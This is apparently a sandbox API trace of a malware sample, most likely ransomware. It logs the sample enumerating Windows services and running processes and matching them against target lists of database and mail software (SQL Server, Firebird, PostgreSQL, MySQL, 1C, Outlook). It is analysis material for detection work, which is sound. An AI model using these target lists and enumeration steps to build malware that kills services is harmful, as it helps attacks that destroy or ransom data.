	[0057.842] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0057.842] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0057.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0057.842] lstrlenW (lpString="Schedule") returned 8
	[0057.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0057.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0057.842] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0057.842] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0057.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0057.842] lstrlenW (lpString="SENS") returned 4
	[0057.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0057.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0057.842] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0057.842] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0057.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0057.842] lstrlenW (lpString="ShellHWDetection") returned 16
	[0057.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0057.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0057.842] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0057.842] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0057.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0057.842] lstrlenW (lpString="Spooler") returned 7
	[0057.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0057.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0057.842] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0057.842] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0057.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0057.842] lstrlenW (lpString="swprv") returned 5
	[0057.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1
	[0057.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1
	[0057.843] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1
	[0057.843] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1
	[0057.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1
	[0057.843] lstrlenW (lpString="SysMain") returned 7
	[0057.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0057.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0057.843] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0057.843] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0057.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0057.843] lstrlenW (lpString="Themes") returned 6
	[0057.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0057.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0057.843] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0057.843] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0057.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0057.843] lstrlenW (lpString="TrkWks") returned 6
	[0057.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0057.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0057.843] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0057.843] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0057.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0057.843] lstrlenW (lpString="UxSms") returned 5
	[0057.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0057.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0057.843] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0057.843] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0057.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0057.843] lstrlenW (lpString="VSS") returned 3
	[0057.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1
	[0057.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1
	[0057.843] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1
	[0057.843] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1
	[0057.844] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1
	[0057.844] lstrlenW (lpString="WdiServiceHost") returned 14
	[0057.844] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0057.844] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0057.844] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0057.844] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0057.844] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0057.844] lstrlenW (lpString="WdiSystemHost") returned 13
	[0057.844] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0057.844] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0057.844] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0057.844] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0057.844] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0057.844] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0057.844] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0057.844] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0057.844] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0057.844] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0057.844] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0057.844] lstrlenW (lpString="Winmgmt") returned 7
	[0057.844] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0057.844] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0057.844] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0057.844] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0057.844] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0057.844] lstrlenW (lpString="WPDBusEnum") returned 10
	[0057.844] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0057.844] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0057.844] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0057.844] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0057.844] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0057.844] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4b70c0 | out: hHeap=0x7d60000) returned 1
	[0057.844] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23c
	[0057.847] Process32FirstW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0057.847] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0057.848] lstrlenW (lpString="System") returned 6
	[0057.848] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0057.848] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0057.848] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0057.848] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0057.848] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0057.848] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0057.848] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0057.848] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0057.848] lstrlenW (lpString="smss.exe") returned 8
	[0057.848] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0057.848] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0057.848] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0057.849] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0057.849] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0057.849] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0057.849] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0057.849] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0057.849] lstrlenW (lpString="csrss.exe") returned 9
	[0057.849] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0057.849] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0057.849] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0057.849] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0057.849] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0057.849] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0057.849] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0057.849] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0057.850] lstrlenW (lpString="wininit.exe") returned 11
	[0057.850] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0057.850] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0057.850] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0057.850] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0057.851] lstrlenW (lpString="csrss.exe") returned 9
	[0057.851] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0057.851] lstrlenW (lpString="winlogon.exe") returned 12
	[0057.851] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0057.852] lstrlenW (lpString="services.exe") returned 12
	[0057.852] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0057.852] lstrlenW (lpString="lsass.exe") returned 9
	[0057.852] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0057.853] lstrlenW (lpString="lsm.exe") returned 7
	[0057.853] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0057.853] lstrlenW (lpString="svchost.exe") returned 11
	[0057.853] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0057.854] lstrlenW (lpString="svchost.exe") returned 11
	[0057.854] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0057.854] lstrlenW (lpString="svchost.exe") returned 11
	[0057.854] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0057.855] lstrlenW (lpString="svchost.exe") returned 11
	[0057.855] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0057.855] lstrlenW (lpString="svchost.exe") returned 11
	[0057.855] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0057.856] lstrlenW (lpString="audiodg.exe") returned 11
	[0057.856] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0057.856] lstrlenW (lpString="svchost.exe") returned 11
	[0057.856] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0057.857] lstrlenW (lpString="svchost.exe") returned 11
	[0057.857] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0057.857] lstrlenW (lpString="dwm.exe") returned 7
	[0057.857] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0057.857] lstrlenW (lpString="explorer.exe") returned 12
	[0057.858] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0057.858] lstrlenW (lpString="spoolsv.exe") returned 11
	[0057.858] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0057.858] lstrlenW (lpString="taskhost.exe") returned 12
	[0057.858] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0057.859] lstrlenW (lpString="svchost.exe") returned 11
	[0057.859] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0057.859] lstrlenW (lpString="taskeng.exe") returned 11
	[0057.859] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0057.860] lstrlenW (lpString="taskhost.exe") returned 12
	[0057.860] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0057.860] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0057.860] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0057.861] lstrlenW (lpString="python tragedy.exe") returned 18
	[0057.861] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0057.861] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0057.861] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0057.862] lstrlenW (lpString="computers.exe") returned 13
	[0057.862] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0057.862] lstrlenW (lpString="separated.exe") returned 13
	[0057.862] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0057.863] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0057.863] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0057.863] lstrlenW (lpString="darkness.exe") returned 12
	[0057.863] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0057.864] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0057.864] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0057.864] lstrlenW (lpString="sophisticated.exe") returned 17
	[0057.864] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0057.865] lstrlenW (lpString="wishlist.exe") returned 12
	[0057.865] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0057.865] lstrlenW (lpString="top.exe") returned 7
	[0057.865] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0057.866] lstrlenW (lpString="implemented.exe") returned 15
	[0057.866] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0057.866] lstrlenW (lpString="comp.exe") returned 8
	[0057.866] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0057.867] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0057.867] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0057.885] lstrlenW (lpString="solved.exe") returned 10
	[0057.886] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0057.886] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0057.886] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0057.887] lstrlenW (lpString="trips.exe") returned 9
	[0057.887] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0057.887] lstrlenW (lpString="tumormanual.exe") returned 15
	[0057.887] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0057.888] lstrlenW (lpString="telecom.exe") returned 11
	[0057.888] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0057.888] lstrlenW (lpString="realistic.exe") returned 13
